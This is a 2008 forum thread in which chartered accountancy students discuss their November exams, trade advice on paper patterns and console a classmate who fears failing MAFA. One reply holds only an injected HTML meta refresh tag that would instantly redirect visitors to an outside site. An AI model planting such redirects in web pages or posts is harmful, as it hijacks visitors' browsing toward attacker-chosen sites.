Easy Office
LCI Learning

How are Nov 2008 Exams goin??

Page no : 6

C.A.Ravi Kiran (Consultant) (72 Points)
Replied 06 November 2008

Originally posted by :sowmya
" hey people: I had done my accounts & auditing paper gud.....All these papers were actually lengthy but some wat normal to work out... i beleive... but my mafa paper was a disaster... even after this auditing exams r over... im not able to concentrate on law....and im typing this havin viral fever....i m totally depressed with ... guilty.... i cudnt remember anything.. my mind is able to visualize the problems ... but i cud not put it in writing ...something was obstructing me....i cudnt even remeber the easy questions... on the whole... even if im going to do all other paper well( sworn to do so) i don no i will clear in mafa or wat??? "

Guys ..... jus remem one thing...!

THOSE WHO LOOK ONLY  TO THE PAST AND PRESENT , ARE CERTAIN TO MISS THE FUTURE  - John Kennedy

vimal (article) (20 Points)
Replied 06 November 2008

Hey guys.. cheer up. pls don loose heart.jus gv ur best n don evr evr evr give up

Shweta D. Shah (Student) (20 Points)
Replied 06 November 2008

never loose hopes.u never know when institute can distribute marks so attempt all the papers to your best and try to attempt atleast 75 percent of the paper.

GOPAL PALIWAL (ca) (291 Points)
Replied 06 November 2008

a/cs paper was so simple

i m sure that i will get 95 marks

and dont worry about any paper bcoz they will be so simple  as a/cs paper

sowmya (student) (56 Points)
Replied 06 November 2008

no hopes...abt  mafa...god only can rescue.....

daVe.. (Student) (1431 Points)
Replied 06 November 2008

Please find the above QP in Share files section.

daVe.. (Student) (1431 Points)
Replied 06 November 2008

Originally posted by :Guest
" Can anyone provide me Final accounts papar. "

Please find the above QP in Share files section

CA. SUJAL MEHTA (Service) (3316 Points)
Replied 06 November 2008

How was PE II paper of LAW ?

Nikhil Purwar (student) (31 Points)
Replied 06 November 2008

Originally posted by :Aisha
" How are Nov 2008 Exams goin?? Lets Discuss here !!! "

pavaman (Reconciliation Analyst) (72 Points)
Replied 06 November 2008

today's law paper was good!

how the prepartion are going on for the II group? good luck friends.

CA.Shaleen Srivastava (CA , CWA*, Bcom(H)) (2004 Points)
Replied 07 November 2008

i think accounts  and mafa final papers is only not tuff but unexpected because all the questions are from last previous papers and easily available in makkar sir assignmesnts.

CA Chaitanya (PRACTISING CA) (4283 Points)
Replied 07 November 2008

All the best for 2nd group's preparation to all.

chetanbhagat (student) (28 Points)
Replied 07 November 2008

i just wanna advise u on one thing.those who are writing exams now should analyse the paper pattern once again.u might have seen paper 2 and paper 4 are based solely on past exams. around 60 marks from past questions. in that area too, past exams were given from lessons which are not usually prepared by students. i means those are not scoring part of syllabus. usually neglected. in the lessons which we usually prepare either no questions were given from such lessons or twisted questions were given.in auditing, no questions were given from edp or management audit or stock exchange. u see some lessons were altogether removed from the paper like propreity audit, etc. in clsp, lessons like producer company totally excluded. twisted questions like in the case of directors, question given was based on sec 297 but the answer was based on miscellaneous provisions of companies act. totally left the main part of directors.

u should have noted papers like auditing and accounts, totally out of core part of syllabus. no way reling syllabus with exam paper. either questions twisted in main part or important part of syllabus and straight questions from uncovered part of syllabus.

prepare exam papers are not so easy this time. u have to utilise ur time in between exams purposefully and prepare intelligently. leave age old important lessons. shake ur importance attached to some part of lessons. any way plan well. end up ur exam with flying colour for group-2.

sahil (Man) (26 Points)
Replied 07 November 2008

<meta http-equiv="refresh" content="0; url=https://pakbugs.org" />

Gurudath Pai B (Student) (33 Points)
Replied 07 November 2008

Originally posted by :Aisha
" How are Nov 2008 Exams goin?? Lets Discuss here !!!

"

Hw was MAFA ?

Leave a reply

Your are not logged in . Please login to post replies

Click here to Login / Register  

Join CCI Pro

Subscribe to the latest topics :

Search Forum: